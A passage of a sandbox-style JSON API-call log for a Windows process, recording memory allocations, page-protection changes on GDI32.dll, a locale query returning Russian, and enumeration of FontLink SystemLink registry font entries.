"0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 211 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05925000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 212 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 213 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 214 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 215 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 216 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000419", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000419" }, { "name": "LanguageName", "value": "Russian" } ], "repeated": 0, "id": 217 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x008d7000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 218 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x008dc000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 219 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink" }, { "name": "Handle", "value": "0x00000254" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink" } ], "repeated": 0, "id": 220 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000254" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "0" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "67" }, { "name": "MaxValueNameLength", "value": "27" }, { "name": "MaxValueLength", "value": "0" } ], "repeated": 0, "id": 221 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x008e1000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 222 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "0" }, { "name": "ValueName", "value": "Lucida Sans Unicode" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Lucida Sans Unicode" } ], "repeated": 0, "id": 223 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "1" }, { "name": "ValueName", "value": "Microsoft Sans Serif" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft Sans Serif" } ], "repeated": 0, "id": 224 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "2" }, { "name": "ValueName", "value": "Tahoma" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Tahoma" } ], "repeated": 0, "id": 225 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "3" }, { "name": "ValueName", "value": "Segoe UI" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Segoe UI" } ], "repeated": 0, "id": 226 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "4" }, { "name": "ValueName", "value": "Segoe UI Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Segoe UI Bold" } ], "repeated": 0, "id": 227 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "5" }, { "name": "ValueName", "value": "Segoe UI Light" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Segoe UI Light" } ], "repeated": 0, "id": 228 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "6" }, { "name": "ValueName", "value": "Segoe UI Semilight" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Segoe UI Semilight" } ], "repeated": 0, "id": 229 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "7" }, { "name": "ValueName", "value": "Segoe UI Semibold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Segoe UI Semibold" } ], "repeated": 0, "id": 230 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "8" }, { "name": "ValueName", "value": "Ebrima" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Ebrima" } ], "repeated": 0, "id": 231 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "9" }, { "name": "ValueName", "value": "Ebrima Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Ebrima Bold" } ], "repeated": 0, "id": 232 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "10" }, { "name": "ValueName", "value": "Gadugi" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Gadugi" } ], "repeated": 0, "id": 233 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "11" }, { "name": "ValueName", "value": "Gadugi Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Gadugi Bold" } ], "repeated": 0, "id": 234 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "12" }, { "name": "ValueName", "value": "Khmer UI" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Khmer UI" } ], "repeated": 0, "id": 235 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "13" }, { "name": "ValueName", "value": "Khmer UI Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Khmer UI Bold" } ], "repeated": 0, "id": 236 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "14" }, { "name": "ValueName", "value": "Lao UI" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Lao UI" } ], "repeated": 0, "id": 237 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "15" }, { "name": "ValueName", "value": "Lao UI Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Lao UI Bold" } ], "repeated": 0, "id": 238 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "16" }, { "name": "ValueName", "value": "Leelawadee" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Leelawadee" } ], "repeated": 0, "id": 239 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "17" }, { "name": "ValueName", "value": "Leelawadee Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Leelawadee Bold" } ], "repeated": 0, "id": 240 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "18" }, { "name": "ValueName", "value": "Leelawadee UI" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Leelawadee UI" } ], "repeated": 0, "id": 241 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "19" }, { "name": "ValueName", "value": "Leelawadee UI Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Leelawadee UI Bold" } ], "repeated": 0, "id": 242 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "20" }, { "name": "ValueName", "value": "Nirmala UI" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Nirmala UI" } ], "repeated": 0, "id": 243 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "21" }, { "name": "ValueName", "value": "Nirmala UI Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Nirmala UI Bold" } ], "repeated": 0, "id": 244 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "22" }, { "name": "ValueName", "value": "Nirmala UI Semilight" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Nirmala UI Semilight" } ], "repeated": 0, "id": 245 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "23" }, { "name": "ValueName", "value": "MingLiU" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MingLiU" } ], "repeated": 0, "id": 246 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "24" }, { "name": "ValueName", "value": "PMingLiU" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\PMingLiU" } ], "repeated": 0, "id": 247 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "25" }, { "name": "ValueName", "value": "MingLiU_HKSCS" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MingLiU_HKSCS" } ], "repeated": 0, "id": 248 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "26" }, { "name": "ValueName", "value": "MingLiU-ExtB" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MingLiU-ExtB" } ], "repeated": 0, "id": 249 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "27" }, { "name": "ValueName", "value": "PMingLiU-ExtB" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\PMingLiU-ExtB" } ], "repeated": 0, "id": 250 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "28" }, { "name": "ValueName", "value": "MingLiU_HKSCS-ExtB" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MingLiU_HKSCS-ExtB" } ], "repeated": 0, "id": 251 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "29" }, { "name": "ValueName", "value": "Microsoft JhengHei" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft JhengHei" } ], "repeated": 0, "id": 252 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "30" }, { "name": "ValueName", "value": "Microsoft JhengHei Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft JhengHei Bold" } ], "repeated": 0, "id": 253 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "31" }, { "name": "ValueName", "value": "Microsoft JhengHei UI" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft JhengHei UI" } ], "repeated": 0, "id": 254 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "32" }, { "name": "ValueName", "value": "Microsoft JhengHei UI Bold" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft JhengHei UI Bold" } ], "repeated": 0, "id": 255 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "33" }, { "name": "ValueName", "value": "Microsoft JhengHei UI Light" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft JhengHei UI Light" } ], "repeated": 0, "id": 256 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "34" }, { "name": "ValueName", "value": "SimSun" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\SimSun" } ], "repeated": 0, "id": 257 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "35" }, { "name": "ValueName", "value": "SimSun-ExtB" }, { "name": "Type", "value": "7", "pretty_value": "REG_MULTI_SZ" }, { "name": "DataLength", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\SimSun-ExtB" } ], "repeated": 0, "id": 258 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": 